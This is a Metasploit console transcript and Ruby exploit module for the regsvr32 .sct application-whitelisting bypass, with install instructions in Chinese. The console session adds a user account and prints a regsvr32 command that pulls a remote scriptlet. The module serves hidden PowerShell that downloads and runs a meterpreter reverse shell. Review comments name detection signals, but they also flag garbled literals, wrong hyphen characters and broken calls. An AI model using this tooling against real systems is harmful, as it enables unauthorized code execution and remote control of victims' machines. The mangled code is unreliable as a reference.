msf auxiliary(server/regsvr32_command_delivery_server) > use auxiliary/server/regsvr32_command_delivery_server
msf auxiliary(server/regsvr32_command_delivery_server) > set CMD net user Micropoor Micropoor /add
CMD => net user Micropoor Micropoor /add
msf auxiliary(server/regsvr32_command_delivery_server) > exploit
[*] Using URL: http://0.0.0.0:8080/ybn7xESQYCGv
[*] Local IP: http://192.168.1.4:8080/ybn7xESQYCGv
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://192.168.1.4:8080/ybn7xESQYCGv scrobj.dll
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module: HTTP server that hosts a Windows scriptlet (.sct)
# whose embedded PowerShell fetches and runs the selected payload.
#
# NOTE(review): this listing was recovered from a whitespace-mangled paste.
# Ruby keywords and identifiers that had lost their separating spaces have been
# re-spaced below; string literals are reproduced exactly as found, including
# several spans that look like extraction damage (see the per-method notes).
#
# Defender-relevant flow, as the code below shows it:
#   1. the operator is told (in #primer) to run
#      `regsvr32 /s /n /u /i:<server-uri>.sct scrobj.dll` on the target;
#   2. regsvr32 requests the .sct resource -> served by #serve_sct_file;
#   3. the scriptlet's PowerShell one-liner requests the base URI ->
#      served by #serve_psh_payload.
# The regsvr32 command line with an http(s) /i: argument plus scrobj.dll, and
# the pair of HTTP requests (".sct" then the bare URI) from the same host, are
# the observable signals this module produces.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpServer

  # Module metadata only; no options beyond the HttpServer/Powershell mixins
  # are declared here. The default payload is windows/meterpreter/reverse_tcp
  # and the only target is 'PSH'.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Regsvr32.exe (.sct) Application Whitelisting Bypass Serve r',
      'Description'    => %q(Thismodule simplifies the Regsvr32.exe ApplicationWhitelistingBypass technique.The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command.
This command then downloads and executes the specified payload (similar to the web_delivery module with PSH).Both web requests (i.e., the .sct file andPowerShell download and execute) can occur on the same port.),
      'License'        => MSF_LICENSE,
      'Author'         => [
        'Casey Smith',   # AppLocker bypass research and vulnerability discovery (@subTee)
        'Trenton Ivey',  # MSF Module (kn0)
      ],
      'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' },
      'Targets'        => [['PSH', {}]],
      'Platform'       => %w(win),
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 19 2016',
      'References'     => [
        # NOTE(review): the hyphens in this URL are U+2010 in the listing, not
        # ASCII '-'; likely a mis-encoding in the copy rather than the source.
        ['URL', 'http://subt0x10.blogspot.com/2016/04/bypass‐application‐whitelisting‐script.html']
      ]
    ))
  end

  # HttpServer hook called once the listener is up: prints the command the
  # operator is expected to run on the target.
  # NOTE(review): as written, `\#{get_uri}` is an escaped interpolation, so
  # the literal text "#{get_uri}" would be printed instead of the server URI.
  # This looks like an extraction artifact — confirm against the upstream file.
  def primer
    print_status('Run the following command on the target machine:')
    print_line("regsvr32 /s /n /u /i:\#{get_uri}.sct scrobj.dll")
  end

  # Request dispatcher: a URI ending in ".sct" gets the scriptlet, anything
  # else gets the PowerShell payload stage.
  # NOTE(review): both callees are invoked without `cli`, yet both reference
  # `cli` in their bodies and `cli` is neither a parameter nor an ivar there.
  # The `cli` argument was probably lost in extraction; as written these calls
  # would raise NameError at request time.
  def on_request_uri(cli, _request)
    # If the resource request ends with '.sct', serve the .sct file;
    # otherwise, serve the PowerShell payload.
    if _request.raw_uri =~ /\.sct$/
      serve_sct_file
    else
      serve_psh_payload
    end
  end

  # Builds the PowerShell download-and-execute one-liner for this server's
  # base URI, wraps it in a scriptlet via #gen_sct_file, and returns it as
  # text/plain.
  # `ignore_cert` is only assigned when `ssl` is set; otherwise it is nil and
  # interpolates as an empty string, so the prefix is a no-op over plain HTTP.
  # NOTE(review): the 'Content‐Type' header key below contains U+2010 rather
  # than ASCII '-' in this listing; a header named that way would not be the
  # real Content-Type header. Likely mis-encoded in the copy.
  def serve_sct_file
    print_status("Handling request for the .sct file from #{cli.peerhost}")
    ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
    download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(get_uri)
    download_and_run = "#{ignore_cert}#{download_string}"
    psh_command = generate_psh_command_line(
      noprofile: true,
      windowstyle: 'hidden',
      command: download_and_run
    )
    data = gen_sct_file(psh_command)
    send_response(cli, data, 'Content‐Type' => 'text/plain')
  end

  # Second stage: serves the encoded payload wrapped as a PowerShell command
  # (comspec stripped, single-quoted) for the architecture of the selected
  # payload. Same U+2010 'Content‐Type' caveat as in #serve_sct_file.
  def serve_psh_payload
    print_status("Delivering payload to #{cli.peerhost}")
    data = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      remove_comspec: true,
      use_single_quotes: true
    )
    send_response(cli, data, 'Content‐Type' => 'application/octet‐stream')
  end

  # Produces a GUID-shaped random string (8-4-4-4-12 hex groups) used as the
  # scriptlet's classid, so each served .sct differs.
  # NOTE(review): the separators are U+2010 in this listing and the last call
  # appears as `rand_text_hex12` (no space before the argument) — both look
  # like copy damage; as written the last call would be a NoMethodError.
  def rand_class_id
    "#{Rex::Text.rand_text_hex 8}‐#{Rex::Text.rand_text_hex 4}‐#{Rex::Text.rand_text_hex 4}‐#{Rex::Text.rand_text_hex 4}‐#{Rex::Text.rand_text_hex12}"
  end

  # Renders the scriptlet XML that runs `command` via WScript.Shell when
  # regsvr32 registers it.
  # NOTE(review): several spans of this literal appear garbled in the listing
  # (`registrationprogid`, the escaped `\#{rand_text_a lphanumeric 8}`,
  # `ne wActiveXObject`, and a `<script>` where a closing `</script>` is
  # expected). Reproduced verbatim here; confirm against the upstream file.
  def gen_sct_file(command)
    %{<?XML version="1.0"?><scriptlet><registrationprogid="\#{rand_text_a lphanumeric 8}"classid="{#{rand_class_id}}"><script><![CDATA[ var r = ne wActiveXObject("WScript.Shell").Run("#{command}",0);]]><script></registration></scriptlet>}
  end
end
使用方法:
copy regsvr32_applocker_bypass_server.rb to /usr/share/metasploit-framework/modules/exploits/windows/misc